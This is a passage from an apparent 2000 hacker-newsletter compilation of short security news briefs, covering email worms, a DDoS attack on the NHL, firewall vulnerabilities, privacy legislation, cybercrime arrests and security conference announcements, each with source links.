~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Roelof Nasser Mohammed, the director of crime services at the South African Police Services (SAPS), has announced the creation of the South African Cybercrime Unit. Officials are actively searching for recruits to the new posts and have not as yet determined its size. Net Assets http://www.netassets.co.za/netassets/sitewide/content/direct/1,2275,62 1905-5858-0,00.html @HWA 71.0 [HNN] May 24'00 Info-Con Ratings To Be Used for Cyber Threats ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopalyse The Pentagon has decided to post threat condition assessments when it is under an information warfare attack. Info-Cons or "information conditions" will be decided by US Space Command which is the home of JTF-CND. Reactions to Info-Con warnings could range from rejecting e-mails from unknown addresses to shutting down the networks. It is hoped that "Information Condition" warning levels will be defined within the next few weeks. ABC News http://abcnews.go.com/sections/tech/DailyNews/pentagon000523.html @HWA 72.0 [HNN] May 24'00 Ticketmaster to Sell RootFest Tickets ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by lothos RootFest tickets are now available via all TicketMaster locations, including their web site. Tickets can still be purchased during the event at the RiverCentre Box Office. Rootfest, the Midwest's premier computer security event, will be held June 14 - 16 in Minneapolis, Minnesota. TicketMaster RootFest https://ticketing.ticketmaster.com/cgi/purchasePage.asp?event_id http://www.rootfest.org @HWA 73.0 [HNN] May 24'00 Zero-Knowledge Teams With IBM ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Craig Zero-Knowledge Systems and IBM announce yesterday at ISPCON in Orlando that they will partner together to offer privacy solutions to ISPs. Over the next 12 months, IBM and Zero-Knowledge(r) will install 1,000 IBM Netfinity 4000R servers running Zero-Knowledge's Freedom software, at hundreds of ISPs and telecommunication backbone nodes throughout the world to expand the cryptographically assured global privacy infrastructure of the Freedom network. At Internet World in London Zero Knowledge announced an alliance with Carrier1 International S.A. to enable private Internet use for European citizens by deploying Freedom Network servers at major routing points across Europe. Zero Knowledge http://www.zeroknowledge.com @HWA 74.0 [HNN] May 24'00 The Little Miscreants That Could ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by evenprime Mafiaboy and Curador, investigated and discovered by the FBI, or where there other people involved? Is the FBI really that good as to be able to track these teenage troublemakers down? ZD Net http://www.zdnet.com/zdnn/stories/comment/0,5859,2573856,00.html @HWA 75.0 [HNN] May 24'00 French Say No Anonymity on Web ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopalyse Sponsored by the French Government the Liberty of Communication Act would require all web publishers to register with authorities. This would essentially eliminate all anonymous web postings. The legislation, passed has passed the French House and being debated in the Senate this week, would apply to any company that hosts World Wide Web pages viewable by the public. Associated Press - via San Jose Mercury News http://www.mercurycenter.com/svtech/news/breaking/ap/docs/25664l.htm @HWA 76.0 [HNN] May 24'00 Experts Stress Education Over Laws ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench During the National Colloquium for Information Systems Security Education in Washington, D.C. experts stressed that education, research and development programs, are where the solutions to cybercrime will come from and not more laws and jail time. Federal Computer Week http://www.fcw.com/fcw/articles/2000/0522/web-cyber-05-24-00.asp @HWA 77.0 [HNN] May 25'00 NHL Hit with DDoS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopalyse The National Hockey League was hit with a Distributed Denial of Service attack on Sunday which knocked it off line. NHL technicians where still trying to filter out the illegitimate requests yesterday. The league has said that it has filed a formal complaint with the FBI and have asked several security firms to help. Associated Press - via San Jose Mercury News http://www.mercurycenter.com/svtech/news/breaking/ap/docs/31233l.htm @HWA 78.0 [HNN] May 25'00 FCC Rules Under Appeal ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench The US Court of Appeals in Washington is hearing arguments regarding rules issued last year by the FCC. The rules spell out how telecommunications carriers will need to comply with the Communications Assistance Enforcement Act (CALEA). The rules require carriers to impliment technology to pinpoint celluar phone users without a warrant and give the FBI the capability to intercept Internet traffic. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2570897,00.html?chkpt @HWA 79.0 [HNN] May 25'00 Privacy Issue Still Hot In DC ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by root66 Sen. Fritz Hollings (D-S.C.), will introduce legislation that will require Web sites to conform to the FTC's fair information practices, meaning that they would have to provide consumers notice about, consent for and access to information collected online, as well as ensure security of that data. The Senate Commerce Committee will hold a hearing Thursday on the FTC's recommendation that the government needs to force web sites to comply with privacy initiatives. The FTC has been accused of wanting to regulate the problem as opposed to identifying the cause and finding solutions. Civic.com http://www.civic.com/civic/articles/2000/0522/web-3ftc-05-24-00.asp @HWA 80.0 [HNN] May 25'00 Australia Electoral Information Sold For Tax Mailing ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by hool54000 Following the revelation two weeks ago that Canada maintains a massive database on its citizens it has now been learned that the Australian Electoral Commission has sold the information it had (age, address, marital status, etc.) to the taxation department. The Australian Taxation Office used the information to conduct a mass mailing about new taxation laws. Australian Broadcasting Commission News Limted http://www.abc.net.au/news/2000/05/item20000525004954_1.htm http://www.news.com.au/common/story_page/0,4057,726998%255E1702,00.htm l @HWA 81.0 [HNN] May 25'00 Cybercops Meet in Boston ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by no0ne Attorney Generals from the state of Massachusetts and other law enforcement personnel will gather in Waltham MA, for a conference on computer crime. Other attendees include Weld Pond from the @stake L0pht Labs. The discussion will center around the 'new criminal frontier', how to assess a network's vulnerabilities, and what options are available for cybercrime victims. The conference will be held from 1 p.m. to 5:30 p.m. today at the Westin Hotel in Waltham, MA. Boston Herald http://www.bostonherald.com/business/technology/hack05242000.htm @HWA 82.0 [HNN] May 25'00 CERT Releases Advisory on Week Old Issue ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Space Rogue The Computer Emergency Response Team at Carnegie Mellon has issued advisory CA-2000-07 regarding Microsoft Office 2000 UA ActiveX Control. The advisory was issued yesterday in the late afternoon. The @stake L0pht Labs initially released their advisory, demonstration code, and patch ten days before. @stake L0pht Labs CERT Microsoft http://www.l0pht.com/advisories/msoua.txt http://www.cert.org/advisories/CA-2000-07.html http://microsoft.com/technet/security/bulletin/ms00-034.asp @HWA 83.0 [HNN] May 26'00 Physical Security Is Real Weak ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench A report issued by the General Accounting Office details how armed investigators breached security at several government installations using phony IDs and credentials purchased off the Internet. At the Pentagon, CIA, Justice Department, FBI, State Department and 14 other agencies investigators where able to gain access to the buildings without being searched and often times being waived past security checkpoints. Knight Ridder - via The Age CNN http://www.theage.com.au/breaking/0005/25/A17287-2000May25.shtml http://www.cnn.com/2000/US/05/24/security.breaches/index.html @HWA 84.0 [HNN] May 26'00 Reno Does About Face ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by tjadams69 "I think any time you expose vulnerabilities it's a good thing," said Attorney General Janet Reno. Her comment was directed to investigators who posed as false security agents to gain access to supposedly secure government buildings. How does 'exposing vulnerabilities' go from good in the real world to bad in the cyber world? CNN http://www.cnn.com/2000/US/05/25/security.breaches.01/index.html @HWA 85.0 [HNN] May 26'00 Extortionist Busted ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by no0ne A single charge of using the internet to send extortion threats has been filed against Rob Holcomb. Via his e-mails to Audible Inc., a New Jersey based company which sells on line books, the 36 year old graduate student of Colorado State University claimed to have found a way to download the books for free and would not reveal the system's weakness except in exchange for money, a car and unlimited free download of the company's content. Audible contacted the police who traced the alleged perpetrator after he gave the company a mailing address and phone number at the school. Holcomb could face up to two years in prison and a $100,000 fine. Associated Press - via Las Vegas Sun Internet News http://www.lasvegassun.com/sunbin/stories/tech/2000/may/25/052500388.h tml http://www.internetnews.com/bus-news/article/0,2171,3_380531,00.html @HWA 86.0 [HNN] May 26'00 Australian Man Leaks Sewage Via Computer and Radio ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench An alleged computer intruder used radio transmissions to alter sewage pump stations causing raw sewage to overflow on Queensland's Sunshine Coast. The 49-year-old Brisbane man is expected to face 371 charges when he appears in the Maroochydore Magistrates Court on June 15. The charges include stealing, computer intrusion and using radio communications equipment without authority. AAP Newsfeed - via Lexis-Nexis http://web.lexis-nexis.com/more/cahners-chicago/11407/5873217/1 @HWA 87.0 [HNN] May 26'00 2600 Keeps Lawyer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Macki Judge Kaplan has ruled that the law firm Frankfurt, Garbus, Klein & Selz can continue to represent 2600 in their battle against Time Warner and the other plaintiffs over the posting of the DeCSS code. The plaintiffs had argued that due to the firms representation of Time Warner in other matters it would be a conflict of interest to represent 2600. The Judge disagreed. 2600 http://www.2600.org/news/2000/ @HWA 88.0 [HNN] May 26'00 Preliminary Defcon Speaking Schedule ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by DTangent In preparation for Defcon 8 to be held in Las Vegas at the end of July organizers have released a preliminary speaking schedule. Organizers have also updated the media archives section of the site containing film clips, documentaries and other tidbits from Defcons past. Defcon 8 http://www.defcon.org/ @HWA 89.0 [HNN] May 26'00 Underground Site Form Alliance ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Gh0zT A new alliance has been announced between established computer security sites including the Fringe of the Web, and Project Gamma. This new alliance hopes to increase the quality of content available to its member sites. Iron Box Technologies http://www.ironboxtech.com/ @HWA 90.0 [HNN] May 30'00 Viruses, Viruses, and more Viruses ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopalyse and Weld Pond Computer Associates has warned about a dangerous new virus called Cybernet it spreads by attaching to outgoing e-mail just like the Melissa Virus. Cybernet infects Microsoft Word and Excel files. The e-mail arrives with a subject line "You've GOT Mail !!!" and the text of the message reads: "Please, save the document after you read and don't show to anyone else." Newsbytes Kak Spreading Fast ShoppingPlanet.com accidentally infected 50,000 of its customers when it mailed its newsletter out. The newsletter was infected with the Kak virus. The company quickly sent out a follow up email warning users not to open the previous email. Kak requires no users intervention other than opening email. Anti-virus software vendors have included the virus in their definitions files. Kak only spreads via MS Outlook users, Microsoft issued a patch last year to correct the problem. ZD Net 91.0 [HNN] May 30'00 Resume on the Loose ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A new variant of the old Melissa virus is spreading rapidly. This new variant has a much deadlier payload that will delete the contents in the system and root directories of Windows and Windows NT. It arrives as an attachment with a subject line of 'Resume - Janet Simons' C|Net Tech Web MSNBC ABC News CNN Microsoft - Outlook Email Security Update Norton Symantec http://www.newsbytes.com/pubNews/00/149635.html http://www.zdnet.com/zdnn/stories/news/0,4586,2578234,00.html http://news.cnet.com/news/0-1005-200-1960645.html http://www.techweb.com/wire/story/TWB20000526S0016 http://www.msnbc.com/news/412717.asp http://abcnews.go.com/sections/tech/DailyNews/virus000527.html http://www.cnn.com/2000/TECH/computing/05/27/new.virus.resume/index.ht ml http://officeupdate.microsoft.com/2000/articles/Out2ksecarticle.htm http://vil.nai.com/villib/dispvirus.asp?virus_k http://www.symantec.com/avcenter/venc/data/w97m.melissa.bg.html @HWA 92.0 [HNN] May 30'00 Gauntlet Firewall Breached ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by no0ne "The world's most secure" firewall was breached during a routine security audit by Jim N. Stickley an employee of Garrison Technologies in Austin TX. The hole, a modified buffer overflow attack, could allow an intruder to control the firewall box. Network Associates has issued a patch for the problem. Business Week Network Associates http://www.businessweek.com/bwdaily/dnflash/may2000/nf00526f.htm http://www.nai.com/ @HWA 93.0 [HNN] May 30'00 Software Glitch Short Changes Lottery Winners ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopalyse A former employee of GTech Holdings says the U.S. firm knew a computer software glitch was short-changing some British lottery winners but held off telling the operator, Camelot Group. Britain's independent National Lottery Commission (NLC) said last Saturday the defect caused computers to think there were more winners than there actually were diluting the prize pool. Reuters - via San Jose Mercury News http://www.mercurycenter.com/svtech/news/breaking/reuters/docs/39166l. htm @HWA 94.0 [HNN] May 30'00 Cyberstalking: Hype or Reality ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Lewis Just how serious is cyberstalking? Some estimates put the number of stalkers at 200,000, but no one really knows where that number came from. Sure there have been real world victims but does it warrant all the hype? ZD Net http://www.zdnet.com/intweek/stories/columns/0,4164,2577187,00.html @HWA 95.0 [HNN] May 30'00 Sexy Geeks and Hackers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Weld Pond Free software advocates and free love advocates seem to populate similar groups, but does membership in one automatically mean your a member of the other? Salon http://www.salon.com/tech/feature/2000/05/26/free_love/index.html @HWA 96.0 [HNN] May 30'00 DC Metro Web Site Defaced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench The Washington DC Metropolitan Transit Authority was defaced yesterday by someone who apparently did not appreciate the actions of the rock group Metallica. The defaced page contained numerous obscenities and criticism of the band's lawsuit against Napster. Associated Press - via Washington Post Attrition.org - mirror of defaced page http://www.washingtonpost.com/wp-dyn/articles/A26914-2000May29.html http://www.attrition.org/mirror/attrition/2000/05/29/www.wmata.com/ @HWA 97.0 [HNN] May 30'00 Mitnick to Challenge Computer Ban ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopalyse Publisher Steven Brill, who wants to hire Kevin Mitnick as a columnist, has retained the services of esteemed New York attorney Floyd Abrams. Abrams will file a friend of the court brief to assist Kevin in his fight to lift the bail restrictions placed on him to prevent him from speaking his mind and earning a living. C|Net http://news.cnet.com/news/0-1005-200-1951220.html?tag @HWA 98.0 [HNN] May 30'00 Black Hat Posts Speaker Lists, Adds Old Video Clips ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Dark Tangent The Blackhat web site has added video on-line from past shows, including an excellent key-note speech from Marcus Ranum on how to "really" secure the Internet, a must see. Presentations from BH Asia are available as well, with video added shortly. At BH US this year there will be new security vulnerabilities discussed including transitioning from ring 3 to ring 0 in Windows NT (Breaking their security model), tricks to defeating parts of Firewall-1, and Mudge will talk in depth on passive detection techniques for locating sniffers, based on his work with Anti-sniff. Blackhat http://www.blackhat.com @HWA 99.0 [IND] Pokemon virus hits U.S targetting kids ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Cuddly Pokemon Virus Targets Kids By Richard Meares, Reuters August 24, 2000 Children everywhere beware — Pikachu is not as cuddly as he seems. The Pokemon character has mutated into a nasty little virus, spreading via email like the devastating "Love Bug" did. Virus experts said Thursday that the cute yellow rabbit-like creature, a darling of the Pokemon videogame family, is appearing in the United States as a computer virus, wrecking PCs by wiping out their system files. 'These computers may take you into cyberspace, but they are also running the world.' -- Eric Chien, Symantec So far "Pokey" has sown only a fraction of the havoc its famous predecessor did, but he's giving both computer experts and parents cause for concern. Kids, not corporations, are the target of the cybervandals this time. "We haven't seen viruses or worms targeted at children before," said Eric Chien, chief researcher at antivirus company Symantec's Dutch laboratory. "This is the first one." "Since it comes as a little Pokemon animation, 10-year-olds are likely to be more interested in double-clicking on it." Viruses infect a computer and cause damage, but rely on users to unwittingly spread them from one computer to another. Worms find their own way to spread, usually on the Web. This worm appears as an email with the title "Pikachu Pokemon" and the message "Pikachu is your friend." Japanese antivirus firm Trend Micro advises anyone who receives the email to delete the file without opening it. Pokey bites less but bites harder Earlier this year, the Love Bug raced around the world and caused damage estimated from hundreds of millions to billions of dollars. Many major corporations were forced to shut down their internal communications to stamp it out. It came as an email entitled "ILOVEYOU" with an attachment that, if opened, infected the computer and emailed itself to everyone in the user's Microsoft Outlook address book. Pokey, aimed at children hooked on the worldwide Pokemon craze, has spread more slowly and has not gone as far, giving antivirus software companies like Symantec, Trend Micro, and Britain's Sophos time to mount a defense. But once Pokey gets into your computer, its bite is far more deadly than the Love Bug's. It destroys all files in the Windows and System directories. The Microsoft operating system, used by four-fifths of the world's computers, must be reinstalled from scratch. The Love Bug's most prevalent versions attacked data files such as pictures, but left the whole system intact. People want to be liked -- that's their weakness With 50,000 worms wriggling around cyberspace, Chien said the key to an effective one is to appeal to human emotions. "Love Bug was not really new but the reason it hit so many people was social engineering. These things require people to double-click on them to run them. And who doesn't like to receive a love letter?" Nintendo, the videogame company that owns the copyright to the wildly popular Pokemon — or "pocket monster" — characters, was unavailable for comment. Trend Micro said that, surprisingly, the worm had not surfaced in Japan yet. Europe also seems to be little affected so far. Ironically, the Love Bug and the earlier Melissa virus may have helped computer users defend themselves against viruses. They attracted so much attention that many users now know they should treat unsolicited email attachments with suspicion. Pokey, however, targets a group of users who are not virus-savvy — young children. Chien warned that as the mobile Internet grows, so will the risk of new viruses that target cell phones and online pocket organizers. So far, however, these devices have only suffered text-message (SMS) bombardments. Chien advised people to practice safe surfing — since suspect websites could also contain viruses — and to preach it to children. He said people should stop thinking of computers as some kind of link to a virtual world where real damage could not be done. "These computers may take you into cyberspace — but they are also running the world," he warned. Copyright © 2000 Reuters Limited. Limitations and Restrictions on Use @HWA 100.0 [HNN] May 31'00 Canada To Dismantle Big Bro Database ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by freedom Human Resources Minister Jane Stewart has relented to public pressure and has announced that the massive database containing information on nearly every Canadian is to be dismantled. The Longitudinal Labor Force File has already severed links with databases at the Revenue Department and other agencies. She said she will also be recommending legal protections for the information used in her department. Some experts doubt that the government will simply delete the data. Globe and Mail Ottawa Citizen Wired Newsbytes Canoe.com http://www.globeandmail.ca/gam/National/20000530/UBIGGN.html http://www.ottawacitizen.com/national/000530/4185962.html http://wired.com/news/politics/0,1283,36649,00.html http://www.newsbytes.com/pubNews/00/149805.html http://ads.canoe.ca/CNEWSTopNews/bigbro_may30.html @HWA 101.0 [HNN] May 31'00 Resume Causes Little Damage ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench The much hyped 'Killer Resume' worm died a quite death over the weekend causing very little damage. It was feared that the Melissa variant would spread extremely fast on Tuesday morning when people came into work after the long holiday weekend. TechWeb Associated Press - via Nando Times http://www.techweb.com/wire/story/TWB20000530S0012 http://www.nandotimes.com/technology/story/body/0,1634,500210254-50029 4870-501612274-0,00.html @HWA 102.0 [HNN] May 31'00 Hong Kong Pirate Piracy Troubles ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopalyse More than half of all software used in Hong Kong is pirated, software piracy reported by BSA losses from software piracy exceeded $12 billion worldwide in 1999 and topped $59 billion over the last five years, according to the BSA-commissioned survey. CNN http://www.cnn.com/2000/ASIANOW/east/05/29/hk.piracy.reut/index.html @HWA 103.0 [HNN] May 31'00 New Zealand Man Claims Virus Info Stolen ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles A New Zealand man claims that he has stumbled onto the biggest hole in MS outlook yet. The hole would allow malicious Java code to be executed on a Windows/Outlook machine without any user intervention. He said that soon after he contacted Microsoft the information was stolen off his computer by someone who broke into it. Microsoft says that they never received his initial communication and after reviewing his information claim that there is no security breach involved. The New Zealand Herald http://www.herald.co.nz/storydisplay.cfm?storyID @HWA 104.0 [HNN] May 31'00 Bank Manager Executed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by root66 After manipulating computer records to divert money into his own accounts, Shen Weibiao the former bank manager of a Bank of China branch in Shaoguan city, was executed after the Supreme People's Court rejected his appeal. While the means of his execution was not released most mainland China executions are done by gunshot. South China Morning Post http://www.scmp.com/News/China/Article/FullText_asp_ArticleID-20000530 131544704.asp @HWA 105.0 [HNN] May 31'00 Malaysian ISP Suffers Human Error Security Breach ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by dhillon Mimos Berhad, a government funded research corporation and ISP, has admitted that an employee accidentally placed a large number of confidential files on a publicly accessible web server. Newsbytes http://www.newsbytes.com/pubNews/00/149718.html @HWA 106.0 [HNN] May 31'00 Defcon Updates Web Site ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Dark Tangent Defcon has updated its site with a more complete list of speakers and DJs for this years convention in Las Vegas. Some lost video from DC 2 and DC 6 has been found and put on-line! What did Artimage look like six years ago? Now the truth can be seen! Bonus: The writer of "Enemy of the State" will be screening a copy of the movie on the roof, and take Q&A after. Can't make it this year? There will be streaming media of the talks and DJs available. Defcon 8 http://www.defcon.org @HWA 107.0 [HNN] May 31'00 SWAT Hits Issue 29 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by The Firestarter The UK's longest running underground e-zine, SWAT has just released it's 29th issue on their web site. Swateam http://www.swateam.org @HWA 108.0 [HNN] June 01'00 Pennsylvania Passes Anti-Virus Law ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopalyse It is now a crime to spread computer viruses in Pennsylvania. Legislation signed last week will carry a seven year jail sentence including damage reimbursement for those found guilty. Newsbytes - via Yahoo http://asia.dailynews.yahoo.com/headlines/technology/article.html?s @HWA 109.0 [HNN] June 01'00 MLB Practices Security Through Obscurity ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench Determined not to have a repeat of last year Major League Baseball has initiated an email address verification scheme to during its All-Star balloting. Last year the ballot box for Boston Red Socks shortstop Nomar Garciaparra was fraudulently stuffed with 39,000 extra ballots. This year all email addresses will be verified and audited by a secret system. "There are a few folks out there we'd just assume not know what we're doing," said Tim O'Mara, senior vice president of operations for Bellevue, Wash.-based SeasonTicket.com Inc., which is in charge of this year's electronic tabulations. (Failing to make the procedure public invites suspicion on the integrity of the overall process as well as inviting people who are looking for a challenge.) Computer World http://www.computerworld.com/home/print.nsf/all/000526E3A2 @HWA 110.0 [HNN] June 01'00 Pr0n Detection Software ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by no0ne Software that scans photos for flesh tones and curves to detect nudity is being beta tested by Oklahoma based company Heartsoft Inc. Heartsoft has applied for a patent for this technology. It will be used in conjunction with the company's Internet Safari browser for children. (I can think of a few other good uses as well.) Newsbytes http://www.newsbytes.com/pubNews/00/149866.html @HWA 111.0 [HNN] June 01'00 Fighting the Privacy Bootleggers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by root66 The Gramm-Leach-Bliley Act has made it extremely easy for banks, insurance companies, and investment corporations to compile, share and sell information about you. Prohibited from doing so during the Great Depression these companies are now able to cross reference their databases and come up with all sorts of information about you. Yes, there are ways to Opt-Out but they are difficult and arcane. PC World - via CNN http://www.cnn.com/2000/TECH/computing/05/31/privacy.law.idg/index.htm l @HWA 112.0 [HNN] June 01'00 Marcia Clark Calls Hackers "Undersocialized Schizoids" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Commodore Sloat Well-dressed former prosecuting attorney Marcia Clark (yeah yeah, from the OJ trial) has a column on APB News where she lambastes hackers as pathological misfits "of barely average intelligence." As is typical of such columns, "hackers" are lumped together with any criminal with a computer. APB News http://apbnews.com/newscenter/clark/2000/05/31/clark0531_01.html @HWA 113.0 [HNN] June 01'00 Fake Census Takers on the Prowl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench In an effort to scam people out of their Social Security and Bank Account numbers people posing as fake Census takers are calling on households. There have been scattered reports of impostors in Arkansas, North Dakota, and northeastern Pennsylvania. The con artists seem to be targeting elderly people. Associated Press - via Yahoo http://dailynews.yahoo.com/h/ap/20000601/pl/census_scams_1.html @HWA 114.0 [HNN] June 02'00 Top Ten Internet Security Problems ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Marc The SANS Institute has issued a report detailing the top ten security issues facing the Internet today. They include weaknesses in BIND, CGIs, RPCs, RDS, Sendmail, Global Filesharing, Weak User IDs and passwords, IMAP and POP buffer overflows, and SNMP community strings set to 'public'. The report describes each problem, lists CVE entries and offers advice on how to correct the issue. SANS PC World Federal Computer Week http://www.sans.org/topten.htm http://www.pcworld.com/pcwtoday/article/0,1510,17005,00.html http://www.fcw.com/fcw/articles/2000/0529/web-topten-06-02-00.asp @HWA 115.0 [HNN] June 02'00 MPAA Attempts to Bar Press From Hearings ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Macki Lawyers for the Motion Picture Association of American have asked the court to seal the upcoming hearings involving 2600 and to keep court records private. MPAA feels that releasing the names of its employees involved in anti-piracy efforts would place in harm's way. They are also concerned about releasing information regarding their anti-piracy operations. 2600 Court Brief http://www.2600.com/news/2000/0601.html http://www.2600.com/dvd/docs/2000/0531-mpo.html#kaj @HWA 116.0 [HNN] June 02'00 Anti-Virus Vendors Blame Media for Virus Hype ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by root66 Anti-Virus vendors are calling for an established unified grading system to categorize viruses to prevent the media from getting into a feeding frenzy and spreading hype and misinformation (aka FUD). They site the recent 'resume' scare as an example. Silicon.com http://www.silicon.com/a37811 @HWA 117.0 [HNN] June 02'00 Summercon 2000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench Summercon 2000, presented by r00t, Phrack Magazine, FEH, & 9mm, will be held this weekend on June 2nd through the 4th. The conference will be at the Omni Hotel @ CNN Center in Atlanta, GA. Summercon is the longest continuously run con still in existence. Summercon http://www.summercon.org/ @HWA 118.0 [HNN] June 02'00 India's First Cyber Criminal Arrested ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by no0ne A 24 year old computer engineer has been arrested by the Indian Police for stealing over 100 hours of internet time. After being called to activate the account of a retired army officer, the service engineer changed the password of the account and later accessed it from 10 different locations. BBC http://news.bbc.co.uk/hi/english/world/south_asia/newsid_773000/773025 .stm @HWA 119.0 [HNN] June 02'00 Libnet for NT Now Available ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Marc eEye Digital Security has released LibnetNT as an open source project to help speed development. LibnetNT is similar to the popular Unix Libnet which is used to implement low level packet functionality into a program. LibnetNT has the exact same functionality and abilities as Libnet except LibnetNT can be used to develop low level packet injection programs on Windows NT4.0 and Windows NT5. eEye Digital Security http://www.eeye.com/html/Databases/Software/libnetnt.html @HWA 120.0 [HNN] June 05'00 FW-1 Vulnerable to Fragmented Packets ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Lance An advisory posted to BugTraq this morning indicated that every Firewall-1 installation may be susceptible to a DoS attack from incomplete or illegal packet fragments. Since FW-1 waits until it has a complete packet before it inspects or logs the information filter rules will not help. Checkpoint has reportedly developed a short term solution (We could not find it on their web site this morning) and are working on a long term fix to be rolled out in a later service pack. BugTraq - via Security Focus Checkpoint http://www.securityfocus.com/templates/archive.pike?list http://www.checkpoint.com @HWA 121.0 [HNN] June 05'00 Australian Tax Office Sells Private Info ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by tall.drink Privacy Commissioner, Mr Malcolm Crompton, has stated that the Australian Taxation Office had broken privacy laws by releasing personal information supplied by individual applicants for an Australian Business Number. The ABN application form states that the name, address, e-mail address, phone number, etc of applicants will remain 'confidential' It dies not say that anyone can purchase this information for $20, a clear violation of Australia's Privacy Act. The Tax Office will develop guidelines to prevent this from occurring in the future. (I guess we can all rest easy now.) Sydney Morning Herald http://www.smh.com.au/news/0006/06/national/national5.html @HWA 122.0 [HNN] June 05'00 British Have Lost Dozens of Laptops ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles Britain's Ministry of Defense has revealed that since May of 1997 it has had 59 laptops stolen and 8 'lost' by staff members. The numbers where revealed in a written explanation to the House of Commons yesterday. (How do you loose a laptop?) Associated Press - via Nando Times http://www.techserver.com/noframes/story/0,2294,500212323-500298954-50 1646000-0,00.html @HWA 123.0 [HNN] June 05'00 S.2448 Analysis ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench An analysis of S.2448 the Internet Integrity and Critical Infrastructure 